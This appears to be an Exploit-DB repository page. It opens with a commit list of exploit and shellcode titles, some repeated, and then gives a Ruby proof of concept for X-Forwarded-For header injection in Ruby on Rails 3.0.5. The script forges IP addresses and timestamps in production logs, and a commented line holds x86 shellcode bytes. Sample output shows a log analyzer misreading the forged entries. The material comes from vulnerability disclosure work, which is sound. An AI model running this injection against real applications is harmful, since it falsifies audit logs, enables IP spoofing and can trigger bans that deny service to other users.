880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
78 lines
No EOL
2.9 KiB
Ruby
Executable file
78 lines
No EOL
2.9 KiB
Ruby
Executable file
source: https://www.securityfocus.com/bid/46423/info
|
||
|
||
Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input.
|
||
|
||
By inserting arbitrary data into the affected HTTP header field, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
|
||
|
||
NOTE: This issue only affects requests sent from clients on the same subnet as the server.
|
||
|
||
Ruby on Rails 3.0.5 is vulnerable; other versions may also be affected.
|
||
|
||
#Encoding: UTF-8
|
||
#
|
||
# Log-File-Injection - Ruby on Rails 3.05
|
||
# possibilities:
|
||
# - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings)
|
||
# - ip spoofing
|
||
# - binary log-injections
|
||
# - DOS if ip is used with an iptables-ban-script
|
||
#
|
||
# !! works only on intranet apps !!
|
||
#
|
||
# Fix:
|
||
# validate request.remote_ip until they fix it
|
||
# -----------------------
|
||
# jimmybandit.com
|
||
# http://webservsec.blogspot.com
|
||
|
||
require 'rubygems'
|
||
require 'mechanize'
|
||
require 'iconv'
|
||
|
||
ip = "192.168.1.21 "
|
||
# some shell code just for binary-data demo
|
||
|
||
payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attacks with ipspoofing
|
||
# payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible
|
||
|
||
a = Mechanize.new
|
||
a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload }
|
||
|
||
page = a.get('http://192.168.1.21/people')
|
||
|
||
# results
|
||
=begin
|
||
################################
|
||
production.log:
|
||
################################
|
||
Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011
|
||
Processing by PeopleController#index as
|
||
Rendered people/index.html.erb within layouts/application (24.4ms)
|
||
Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms)
|
||
|
||
################################
|
||
request-log-analyzer:
|
||
################################
|
||
web@debian:~/testapp/log$ request-log-analyzer production.log
|
||
Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0
|
||
Website: http://railsdoctors.com
|
||
|
||
production.log: 100% [==========] Time: 00:00:00
|
||
|
||
Request summary
|
||
???????????????????????
|
||
Parsed lines: 14
|
||
Skipped lines: 0 <-------
|
||
Parsed requests: 7 <-------
|
||
Skipped requests: 0
|
||
Warnings: teaser_check_failed: 7
|
||
|
||
First request: 2009-01-01 00:00:12
|
||
Last request: 2009-01-01 00:00:12
|
||
Total time analyzed: 0 days
|
||
Request distribution per hour
|
||
????????????????????????????
|
||
0:00 ? 7 hits/day ? <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
1:00 ? 0 hits/day ?
|
||
...
|
||
=end |